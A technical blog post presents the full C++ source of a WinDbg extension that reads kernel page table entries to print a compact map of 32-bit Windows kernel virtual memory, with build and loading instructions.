<span style="font-family: Verdana, sans-serif;"><b>A WinDbg extension to print the kernel memory layout</b> (Scrammed!, giulia, 2015-02-17)</span><br /><div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">WinDbg is an awesome debugger, but I always missed the nice, compact and tidy view of the process memory layout that you have in OllyDbg (in <i>View->Memory</i>). Obviously WinDbg is capable of showing information about the virtual memory of a process (e.g. with <i>!vad</i>) or of the kernel (e.g. with <i>!address</i>), but I don't really like the output format of its commands. I wanted a fast-to-read output, thus I decided to experiment with WinDbg's interfaces to write my own extension capable of printing a convenient map of all the kernelmode virtual memory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I chose to develop a DbgEng-style extension (see <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff551059(v=vs.85).aspx">this</a> documentation for more information about the extension styles, and how to write an extension in general) that basically provides one main command that does the job. I wrote it for 32bit Windows machines, but I am planning to extend it to 64bit platforms as well. I tested it on Windows XP 32bit with PAE enabled, and in theory it should work on other 32bit Windows versions (with or without PAE), but I have not had time to run further tests yet.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The strategy of the command is simple: it iterates over all the possible virtual addresses of 4k pages in the kernel space (that is, from <i>0x80000000</i> to <i>0xFFFFFFFF</i>, for now I ignore the /3GB configuration option), it retrieves their corresponding PTEs and prints the attributes that they contain. Adjacent pages that have the same attributes are joined together and printed as a range. The output also includes some relevant symbols, e.g. it locates important regions identified by kernel variables like <i>MmNonPagedPoolStart</i>, <i>MmNonPagedPoolEnd0</i> etc., and it associates the names of loaded drivers to the regions of memory to which they are mapped.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Here are some excerpts from the output:</span></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"> P = present W = writable X = executable L = large</span><br />
<span style="font-family: Courier New, Courier, monospace;"> U/K = user/kernel T = transition Y = prototype S = swapped out/zero demand</span><br />
<span style="font-family: Courier New, Courier, monospace;"> VA Size Attributes</span><br />
<span style="font-family: Courier New, Courier, monospace;">-------------------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080000000 -------- - nt!MmSystemRangeStart </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080004000 0000b000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080010000 0000e000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080039000 0000c000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 000000008009f000 00062000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080400000 00400000 P W X L K - nt - hal</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080a02000 00170000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000080fb1000 0000f000 P W X K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000081000000 01600000 P W X L K - nt!MmNonPagedPoolStart</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000082600000 -------- - nt!MmNonPagedPoolEnd0 </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 0000000082600000 -------- - nt!MiExtraResourceStart </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000b1f96000 00001000 P W X K - kmixer</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000b1f97000 00004000 P X K - kmixer</span><br />
<span style="font-family: Courier New, Courier, monospace;"> ...</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888a000 00001000 P W X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888b000 00001000 P X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888c000 00001000 P W X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f888d000 0000a000 T - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f8897000 00001000 P W X K - Cdfs</span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f88b9000 00001000 T </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f88c9000 00001000 T </span><br />
<span style="font-family: Courier New, Courier, monospace;"> 00000000f88d7000 00003000 P W K </span><br />
<span style="font-family: Courier New, Courier, monospace;"> ...</span><br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The <i>VA</i> and <i>Size</i> fields identify the memory range, <i>Attributes</i> shows the properties of the pages it contains, and the rightmost part of the output lists the symbols contained in that range. A <i>VA</i> with an invalid size (shown as "--------") means that the <i>VA</i> is not allocated, but there is a symbol associated with it nonetheless.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It is clear from the output that <i>VA</i> 80400000 is the beginning of a buffer, composed of two large pages (2MB each), that contains the modules <i>nt</i> and <i>hal</i>. The <i>NonPagedPool</i> is also visible at <i>VA</i> 81000000 (11 large pages).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If we look at <i>VA</i> f888a000, we can see that this region of memory contains the module <i>Cdfs.sys</i>. Interestingly, the second page at VA f888b000 is read only (probably related to the .text section), while VA f888d000 is the start of a set of pages that are not present and are marked as transition PTEs (probably related to the .INIT or .PAGE section).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The following four files are the full source code of the extension.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<b style="font-family: 'Courier New', Courier, monospace;">file 1: exts.cpp</b><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter">#include "dbgexts.h"

char NameBuffer[1024];
char NameBufferPrevious[1024];

// symbol variables, filled in by print_symbol
bool MemSymbolsOk = false;
ULONG64 MemSymbols[][3] = {
    // [api name] [symbol address] [symbol data]
    { (ULONG64)"nt!MmNonPagedPoolStart", 0, 0 },
    { (ULONG64)"nt!MmNonPagedPoolEnd0", 0, 0 },
    { (ULONG64)"nt!MmPagedPoolStart", 0, 0 },
    { (ULONG64)"nt!MmPagedPoolEnd", 0, 0 },
    { (ULONG64)"nt!MmNonPagedPoolExpansionStart", 0, 0 },
    { (ULONG64)"nt!MmNonPagedPoolEnd", 0, 0 },
    { (ULONG64)"nt!MmSystemRangeStart", 0, 0 },
    { (ULONG64)"nt!MiExtraResourceStart", 0, 0 },
    { (ULONG64)"nt!MiExtraResourceEnd", 0, 0 },
    { (ULONG64)"nt!MiSystemViewStart", 0, 0 },
    { (ULONG64)"nt!MiSessionPoolStart", 0, 0 },
    { (ULONG64)"nt!MiSessionPoolEnd", 0, 0 },
    { (ULONG64)"nt!MiSessionViewStart", 0, 0 },
    { (ULONG64)"nt!MmSessionSpace", 0, 0 },
    { (ULONG64)"nt!MiSessionImageStart", 0, 0 },
    { (ULONG64)"nt!MiSessionImageEnd", 0, 0 },
    { (ULONG64)"nt!MiSessionSpaceEnd", 0, 0 },
    { (ULONG64)"nt!MmSystemPteBase", 0, 0 },
    { (ULONG64)"nt!MmSystemPtesStart", 0, 0 },
    { (ULONG64)"nt!MmSystemCacheStart", 0, 0 },
    { (ULONG64)"nt!MmSystemCacheEnd", 0, 0 },
    { (ULONG64)"nt!MmNonPagedSystemStart", 0, 0 },
    { 0, 0, 0 }
};

// passing a ULONG64 as a vararg to the printf-like functions did not work in the 32bit build
// (and %016llx is not supported there), so 64bit values are printed as two 32bit halves
char *Print64(ULONG32 HighPart, ULONG32 LowPart, char *String)
{
    wsprintf(String, "%08x%08x", HighPart, LowPart);
    return String;
}

// avoid 64bit parameters (see Print64): the base address arrives both as a 32bit value
// for the comparisons and as an already formatted string for printing
void PrintRange(ULONG32 BasePageAddress, char *BasePage, ULONG32 BaseSize, ULONG32 Attribs)
{
    char AttribString[12];
    UINT32 i, j;
    HRESULT Result;

    // string with attribs, one letter per column pair: P T W Y X S L - U/K
    memset(AttribString, ' ', sizeof(AttribString));
    if(Attribs & 1)
    {
        // page is valid, print hardware information
        AttribString[0] = 'P';
        if(Attribs & 2) // RW
        {
            AttribString[2] = 'W';
        }
        if(!(Attribs & 0x80000000)) // NX (bit 63 of the PTE, folded into bit 31 by print_layout)
        {
            AttribString[4] = 'X';
        }
        if(Attribs & 0x80) // PS, large page
        {
            AttribString[6] = 'L';
        }
        if(Attribs & 4) // User/Supervisor
        {
            AttribString[8] = 'U';
        }
        else
        {
            AttribString[8] = 'K';
        }
    }
    else
    {
        // page is not valid, print additional information about Prototype, Transition or Software PTEs
        // taken from http://rekall-forensic.blogspot.ie/2014/10/windows-virtual-address-translation-and.html
        // the windbg command "dt -r _MMPTE" shows all the PTE formats
        if( !(Attribs & 0x400) && (Attribs & 0x800) ) // prototype = 0 transition = 1
        {
            // Transition PTE
            AttribString[1] = 'T';
        }
        else if(Attribs & 0x400) // prototype = 1
        {
            // Prototype PTE
            AttribString[3] = 'Y';
        }
        else // prototype = 0 transition = 0
        {
            // Software PTE (paged out/zero demand)
            AttribString[5] = 'S';
        }
    }
    AttribString[10] = 0;
    ExtPrintf(" %s %08x %s ", BasePage, BaseSize, AttribString);

    // print the symbols associated to this VA range
    // (64bit arithmetic for the range end, so a range touching 0xFFFFFFFF does not wrap)
    if(MemSymbolsOk)
    {
        for(i = 0; MemSymbols[i][0] != 0; i++)
        {
            if((ULONG32)(MemSymbols[i][2]) >= BasePageAddress &&
               (ULONG64)(ULONG32)(MemSymbols[i][2]) < (ULONG64)BasePageAddress + BaseSize)
            {
                ExtPrintf(" - %s", (char*)MemSymbols[i][0]);
            }
        }
    }

    // print the module names associated with this VA range
    NameBufferPrevious[0] = 0;
    for(ULONG64 Page = BasePageAddress; Page < (ULONG64)BasePageAddress + BaseSize; Page += 0x1000)
    {
        // try to locate the nearest symbol; the 32bit kernel address is sign extended
        // to 64bit, which is the form the debugger engine expects for 32bit targets
        Result = g_DebugSymbols->GetNearNameByOffset((ULONG64)(LONG)(ULONG32)Page, 0, NameBuffer, sizeof(NameBuffer), NULL, NULL);
        if(Result == S_OK || Result == S_FALSE)
        {
            NameBuffer[sizeof(NameBuffer) - 1] = 0;
            // keep only the module part of "module!symbol"
            for(j = 0; j < sizeof(NameBuffer); j++)
            {
                if(NameBuffer[j] == '!')
                {
                    NameBuffer[j] = 0;
                    break;
                }
            }
            // only print the name if it was not printed before
            if(j < sizeof(NameBuffer) && strcmp(NameBufferPrevious, NameBuffer) != 0)
            {
                ExtPrintf(" - %s", NameBuffer);
                strcpy_s(NameBufferPrevious, sizeof(NameBufferPrevious), NameBuffer);
            }
        }
    }
    ExtPrintf("\n");
}

// split a 64bit value into the two 32bit halves expected by Print64
#define PARAM64(__number, __numstring) Print64((ULONG32)((__number) >> 32), (ULONG32)(__number), __numstring)

HRESULT CALLBACK exthelp(PDEBUG_CLIENT4 Client, PCSTR args)
{
    INIT_API();
    ExtPrintf("\nUse print_symbol to load the symbols required by the extension \n");
    ExtPrintf("Then use print_layout to print the whole memory layout of the kernelspace. \n");
    EXIT_API();
    return S_OK;
}

HRESULT CALLBACK print_layout(PDEBUG_CLIENT4 Client, PCSTR args)
{
    INIT_API();
    ULONG64 PteAddress, PteEntry, BasePage;
    ULONG32 BaseAttributes, CurrentAttribs, BaseSize, i;
    ULONG64 Tables[10];
    ULONG Levels;
    HRESULT Result;
    char TempString1[20];

    // PTE flags, 0-based bit numbers:
    // P   bit 0,  1 = page present
    // RW  bit 1,  0 = read only
    // U/S bit 2,  0 = kernelmode, 1 = usermode
    // PS  bit 7,  0 = 4k, 1 = large page
    // NX  bit 63, 1 = no execute (folded into bit 31 of the 32bit attribute word below)
    ExtPrintf("\n");
    ExtPrintf(" P = present W = writable X = executable L = large\n");
    ExtPrintf(" U/K = user/kernel T = transition Y = prototype S = swapped out/zero demand\n");
    ExtPrintf(" VA Size Attributes\n");
    ExtPrintf("-------------------------------------\n");

    BasePage = 0xFFFFFFFFFFFFFFFF;
    BaseAttributes = 0xFFFFFFFF;
    BaseSize = 0;
    // walk every 4k page of the kernel half of the address space (the /3GB option is ignored)
    for(ULONG64 VAddress = 0x80000000; VAddress <= 0xFFFFF000; VAddress += 0x1000)
    {
        Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);
        if(Result == S_OK)
        {
            if(Levels >= 2)
            {
                // the last entry is the page itself, the one before it is the PTE
                // (or the PDE, for a large page)
                PteAddress = Tables[Levels - 2];
                Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);
            }
            else
            {
                Result = E_FAIL;
            }
        }
        if(Result != S_OK)
        {
            // if there was a previous buffer, print it out
            if(BasePage != 0xFFFFFFFFFFFFFFFF)
            {
                PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);
            }
            // if a symbol refers to a non allocated page, print it here
            if(MemSymbolsOk)
            {
                for(i = 0; MemSymbols[i][0] != 0; i++)
                {
                    if((ULONG64)(ULONG32)(MemSymbols[i][2]) >= VAddress &&
                       (ULONG64)(ULONG32)(MemSymbols[i][2]) < VAddress + 0x1000)
                    {
                        ExtPrintf(" %s -------- - %s \n", PARAM64(VAddress, TempString1), (char*)MemSymbols[i][0]);
                    }
                }
            }
            BasePage = 0xFFFFFFFFFFFFFFFF;
            BaseAttributes = 0xFFFFFFFF;
            BaseSize = 0;
            continue;
        }

        // keep the low 31 bits of the PTE and fold the NX bit (bit 63) into bit 31
        CurrentAttribs = (ULONG32)(PteEntry & 0x7FFFFFFF);
        if(PteEntry & 0x8000000000000000)
        {
            CurrentAttribs |= 0x80000000;
        }

        if(BasePage == 0xFFFFFFFFFFFFFFFF)
        {
            // case first page of buffer
            BasePage = VAddress;
            BaseAttributes = CurrentAttribs;
            BaseSize = 0x1000;
            continue;
        }

        bool new_buf = true;
        if((BaseAttributes & 1) && (CurrentAttribs & 1))
        {
            // P bit set in both: the buffer continues if P, RW, U/S, PS and NX are equal too
            if( (BaseAttributes & 0x80000087) == (CurrentAttribs & 0x80000087) )
            {
                new_buf = false;
            }
        }
        else if(!(BaseAttributes & 1) && !(CurrentAttribs & 1))
        {
            // P bit clear in both: the buffer continues if the prototype/transition bits are equal too
            if( (BaseAttributes & 0x00000C00) == (CurrentAttribs & 0x00000C00) )
            {
                new_buf = false;
            }
        }
        // if P differs between the two, a break is obviously necessary
        if(new_buf)
        {
            // the protection is different: print the buffer and break to a new one
            PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);
            BasePage = VAddress;
            BaseAttributes = CurrentAttribs;
            BaseSize = 0;
        }
        // case following pages
        BaseSize += 0x1000;
    }
    // print the buffer still open when the walk reaches the end of the address space
    if(BasePage != 0xFFFFFFFFFFFFFFFF)
    {
        PrintRange((ULONG32)BasePage, PARAM64(BasePage, TempString1), BaseSize, BaseAttributes);
    }
    EXIT_API();
    return S_OK;
}

HRESULT CALLBACK print_symbol(PDEBUG_CLIENT4 Client, PCSTR args)
{
    INIT_API();
    char TempString1[20];
    char TempString2[20];
    UINT32 i;
    HRESULT Result;

    MemSymbolsOk = false;
    for(i = 0; MemSymbols[i][0] != 0; i++)
    {
        Result = g_DebugSymbols->GetOffsetByName((char*)(MemSymbols[i][0]), &(MemSymbols[i][1]));
        if(Result != S_OK)
        {
            ExtPrintf("Error retrieving symbol %s \n", (char*)MemSymbols[i][0]);
            EXIT_API();
            return Result;
        }
        // the variables are pointer sized on the target (4 bytes on 32bit Windows): read one
        // pointer instead of a fixed 8 bytes, which would pull in the neighbouring variable
        Result = g_DataSpaces->ReadPointersVirtual(1, MemSymbols[i][1], &(MemSymbols[i][2]));
        if(Result != S_OK)
        {
            ExtPrintf("Error reading symbol data for %s \n", (char*)MemSymbols[i][0]);
            EXIT_API();
            return Result;
        }
        ExtPrintf("Symbol retrieved %s, offset: %s data: %s \n", (char*)(MemSymbols[i][0]),
                  PARAM64(MemSymbols[i][1], TempString1), PARAM64(MemSymbols[i][2], TempString2));
    }
    MemSymbolsOk = true;
    EXIT_API();
    return S_OK;
}
</code></pre><br>
<span style="font-family: Courier New, Courier, monospace;"><b>file 2: dbgexts.h</b></span>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define KDEXT_64BIT
#include <wdbgexts.h>
#include <dbgeng.h>
#pragma warning(disable:4201) // nonstandard extension used : nameless struct
#include <extsfns.h>
#ifdef __cplusplus
extern "C" {
#endif
#define INIT_API() \
HRESULT Status; \
if ((Status = ExtQuery(Client)) != S_OK) return Status;
#define EXT_RELEASE(Unk) \
((Unk) != NULL ? ((Unk)->Release(), (Unk) = NULL) : NULL)
#define EXIT_API ExtRelease
// Global variables initialized by query.
extern PDEBUG_DATA_SPACES2 g_DataSpaces2;
extern PDEBUG_DATA_SPACES g_DataSpaces;
extern PDEBUG_SYMBOLS g_DebugSymbols;
HRESULT ExtQuery(PDEBUG_CLIENT4 Client);
void ExtRelease(void);
HRESULT NotifyOnTargetAccessible(PDEBUG_CONTROL Control);
void __cdecl ExtPrintf(PCSTR Format, ...);
#ifdef __cplusplus
}
#endif
</code></pre><br>
<span style="font-family: Courier New, Courier, monospace;"><b>file 3: dbgexts.cpp</b></span>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">#include "dbgexts.h"

PDEBUG_CLIENT4 g_ExtClient;
PDEBUG_CONTROL g_ExtControl;
PDEBUG_DATA_SPACES2 g_DataSpaces2;
PDEBUG_DATA_SPACES g_DataSpaces;
PDEBUG_SYMBOLS g_DebugSymbols;
PDEBUG_SYMBOLS2 g_ExtSymbols;

// queries the engine interfaces used by the commands; on failure, everything
// acquired so far is released again
extern "C" HRESULT ExtQuery(PDEBUG_CLIENT4 Client)
{
    HRESULT Status;
    if ((Status = Client->QueryInterface(__uuidof(IDebugControl), (void **)&g_ExtControl)) != S_OK)
    {
        goto Fail;
    }
    if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols2), (void **)&g_ExtSymbols)) != S_OK)
    {
        goto Fail;
    }
    if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces2), (void **)&g_DataSpaces2)) != S_OK)
    {
        goto Fail;
    }
    if ((Status = Client->QueryInterface(__uuidof(IDebugDataSpaces), (void **)&g_DataSpaces)) != S_OK)
    {
        goto Fail;
    }
    if ((Status = Client->QueryInterface(__uuidof(IDebugSymbols), (void **)&g_DebugSymbols)) != S_OK)
    {
        goto Fail;
    }
    g_ExtClient = Client;
    return S_OK;

Fail:
    ExtRelease();
    return Status;
}

// releases every interface acquired by ExtQuery (the data spaces and symbols
// interfaces included, otherwise a reference leaks on every command)
void ExtRelease(void)
{
    g_ExtClient = NULL;
    EXT_RELEASE(g_ExtControl);
    EXT_RELEASE(g_ExtSymbols);
    EXT_RELEASE(g_DataSpaces2);
    EXT_RELEASE(g_DataSpaces);
    EXT_RELEASE(g_DebugSymbols);
}

void __cdecl ExtPrintf(PCSTR Format, ...)
{
    va_list Args;
    va_start(Args, Format);
    g_ExtControl->OutputVaList(DEBUG_OUTCTL_ALL_CLIENTS, Format, Args);
    va_end(Args);
}

extern "C" HRESULT CALLBACK DebugExtensionInitialize(PULONG Version, PULONG Flags)
{
    *Version = DEBUG_EXTENSION_VERSION(1, 0);
    *Flags = 0;
    return S_OK;
}

extern "C" void CALLBACK DebugExtensionNotify(ULONG Notify, ULONG64 Argument)
{
    return;
}

extern "C" void CALLBACK DebugExtensionUninitialize(void)
{
    return;
}

extern "C" HRESULT CALLBACK KnownStructOutput(ULONG Flag, ULONG64 Address, PSTR StructName, PSTR Buffer, PULONG BufferSize)
{
    return S_OK;
}
</code></pre><br>
<span style="font-family: Courier New, Courier, monospace;"><b>file 4: dbgexts.def</b></span>
<br />
<pre class="CICodeFormatter"><code class="CICodeFormatter">
;--------------------------------------------------------------------
; Copyright (c) 2000 Microsoft Corporation
;
;Module:
; dbgexts.def
;--------------------------------------------------------------------
EXPORTS
;--------------------------------------------------------------------
; These are the extensions exported by dll
;--------------------------------------------------------------------
exthelp
print_layout
print_symbol
;--------------------------------------------------------------------
;
; these are the extension service functions provided for the debugger
;
;--------------------------------------------------------------------
DebugExtensionNotify
DebugExtensionInitialize
DebugExtensionUninitialize
KnownStructOutput
</code></pre>
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">I took some macros from one of the source code templates available in the WinDbg SDK. I had problems when passing 64bit integers as function parameters (the extension was compiled for 32bit), therefore I used a quick and ugly macro (<i>PARAM64</i>) to work around the problem.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The core of the functionality is inside the <i>print_layout</i> function/command in <i>exts.cpp</i>:</span></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>for(ULONG64 VAddress = 0x80000000; VAddress < 0xFFFFF000; VAddress += 0x1000)</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>{</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Result = g_DataSpaces2->GetVirtualTranslationPhysicalOffsets(VAddress, Tables, 10, &Levels);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>...</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>PteAddress = Tables[Levels - 2]; </span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Result = g_DataSpaces->ReadPhysical(PteAddress, &PteEntry, 8, NULL);</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>...</span><br />
<br />
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is the main loop that iterates over every possible page, performing a virtual-to-physical translation with <i>GetVirtualTranslationPhysicalOffsets</i>. This function is very interesting because it returns the entries from all the steps used to perform the translation: the physical address of the <i>PDPT</i>, <i>PDE</i>, <i>PTE</i> and of the page itself (the translation steps change according to the features supported by the CPU). Then, the code uses <i>ReadPhysical</i> to read the PTE and extracts all the attributes from it. The rest of the function simply recognizes ranges of pages that share the same attributes and, for every range identified, <i>PrintRange</i> is invoked.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As the name suggests, <i>PrintRange</i> is in charge of displaying the gathered information for every range, and takes as its arguments a range's virtual address, size and attributes. In addition, it is also responsible for determining whether one of the supported symbols (stored in the array <i>MemSymbols</i>) falls within the range and whether a driver module is associated with the range, by using <i>GetNearNameByOffset</i>. If so, it prints them too. Of course, these two last capabilities only work if the debug symbols are loaded in WinDbg.</span></div>
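<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The PTE decoding done by <i>PrintRange</i> and the range coalescing done by <i>print_layout</i>, reduced to a stand-alone program that can be run without a debugger (an added example, not code from the post): the bit masks are the ones the extension uses, while the page table is constructed data standing in for the values <i>ReadPhysical</i> returns.</span></div>

```cpp
// Added example (not code from the post): the PTE decoding of PrintRange and the
// range coalescing of print_layout as a stand-alone program. The page table is
// constructed data standing in for the values ReadPhysical returns.
#include <cstdint>
#include <cstdio>
#include <string>
#include <vector>

// Hardware bits of an x86 PAE PTE used by the extension (NX is bit 63), plus the
// two software bits the kernel uses when the page is not present.
const uint64_t PTE_PRESENT    = 1ull << 0;
const uint64_t PTE_WRITABLE   = 1ull << 1;
const uint64_t PTE_USER       = 1ull << 2;
const uint64_t PTE_LARGE      = 1ull << 7;
const uint64_t PTE_PROTOTYPE  = 1ull << 10;
const uint64_t PTE_TRANSITION = 1ull << 11;
const uint64_t PTE_NX         = 1ull << 63;

// One slot per 4k page; translated == false models a failed
// GetVirtualTranslationPhysicalOffsets call (no PTE to read).
struct PageEntry { bool translated; uint64_t pte; };
struct Range { uint64_t va; uint64_t size; std::string attribs; };

// Bits that decide whether two neighbouring pages belong to the same range:
// P, RW, U/S, PS and NX for valid pages (0x80000087 in the post's code),
// the prototype/transition bits (0xC00) for invalid ones.
uint64_t RangeKey(uint64_t pte) {
    if (pte & PTE_PRESENT) {
        return pte & (PTE_PRESENT | PTE_WRITABLE | PTE_USER | PTE_LARGE | PTE_NX);
    }
    return pte & (PTE_PROTOTYPE | PTE_TRANSITION);
}

// Same letters the extension prints: P W X L U/K for valid pages, T/Y/S otherwise.
std::string DescribePte(uint64_t pte) {
    if (pte & PTE_PRESENT) {
        std::string s = "P";
        if (pte & PTE_WRITABLE) s += " W";
        if (!(pte & PTE_NX))    s += " X";
        if (pte & PTE_LARGE)    s += " L";
        s += (pte & PTE_USER) ? " U" : " K";
        return s;
    }
    bool prototype  = (pte & PTE_PROTOTYPE) != 0;
    bool transition = (pte & PTE_TRANSITION) != 0;
    if (!prototype && transition) return "T";  // transition PTE
    if (prototype)                return "Y";  // prototype PTE
    return "S";                                // paged out / demand zero
}

// Walks the table starting at `base`, merging neighbours whose RangeKey matches.
// An untranslatable page closes the current range and is skipped, as in print_layout;
// the range still open at the end of the walk is flushed too.
std::vector<Range> Coalesce(uint64_t base, const std::vector<PageEntry>& table) {
    std::vector<Range> out;
    bool open = false;
    uint64_t key = 0;
    Range cur = {0, 0, ""};
    for (size_t i = 0; i < table.size(); ++i) {
        uint64_t va = base + i * 0x1000;
        if (!table[i].translated) {
            if (open) out.push_back(cur);
            open = false;
            continue;
        }
        uint64_t pte = table[i].pte;
        if (open && RangeKey(pte) == key) {
            cur.size += 0x1000;
            continue;
        }
        if (open) out.push_back(cur);
        cur = Range{va, 0x1000, DescribePte(pte)};
        key = RangeKey(pte);
        open = true;
    }
    if (open) out.push_back(cur);
    return out;
}

// Constructed page table loosely modelled on the Cdfs region in the post's output.
std::vector<PageEntry> SamplePageTable() {
    return {
        {true,  PTE_PRESENT | PTE_WRITABLE},           // f888a000  P W X K
        {true,  PTE_PRESENT | PTE_WRITABLE},           // f888b000  merged with the page above
        {true,  PTE_PRESENT},                          // f888c000  P X K (read only)
        {true,  PTE_TRANSITION},                       // f888d000  T
        {true,  PTE_TRANSITION},                       // f888e000  merged
        {false, 0},                                    // f888f000  translation failed
        {true,  PTE_PRESENT | PTE_WRITABLE | PTE_NX},  // f8890000  P W K
        {true,  PTE_PROTOTYPE},                        // f8891000  Y
    };
}

int main() {
    std::printf(" %-16s %-8s Attributes\n", "VA", "Size");
    for (const Range& r : Coalesce(0xf888a000ull, SamplePageTable())) {
        std::printf(" %016llx %08llx %s\n", (unsigned long long)r.va,
                    (unsigned long long)r.size, r.attribs.c_str());
    }
    return 0;
}
```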
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Note that the array of the supported symbols contains the names of internal kernel variables that identify interesting areas of memory (e.g. the paged pool, the non paged pool, etc.), and two empty entries that will be filled at run-time with the virtual address of the symbol and the data it points to. This functionality is implemented in the <i>print_symbol</i> function/command: you should call it before <i>print_layout</i> in order to display the supported symbols.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b><br /></b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The source files <i>dbgexts.cpp</i> and <i>dbgexts.h</i> contain macros and initialization code that are required by the extension, while <i>dbgexts.def</i> contains the definitions of the exported functions (which become the actual commands invoked from the WinDbg command line).</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">To compile the extension, you need to add WinDbg's include and library paths, normally located in:</span></div>
<br />
<span style="font-family: Courier New, Courier, monospace;"> C:\Program Files\Debugging Tools for Windows (x64)\sdk\inc</span><br />
<span style="font-family: Courier New, Courier, monospace;"> C:\Program Files\Debugging Tools for Windows (x64)\sdk\lib\i386</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Make sure that you add the <i>.def</i> file via <i>project->properties->linker->input->module definition file</i> (this works on Visual Studio 2010).</span><br />
<span style="font-family: Verdana, sans-serif;">Once the extension is compiled, place it in WinDbg's extension folder:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> C:\Program Files (x86)\Debugging Tools for Windows (x86)\winext</span><br />
<br />
<span style="font-family: Verdana, sans-serif;">and load it from WinDbg with:</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.load <extensionfilename></span><br />
<br />
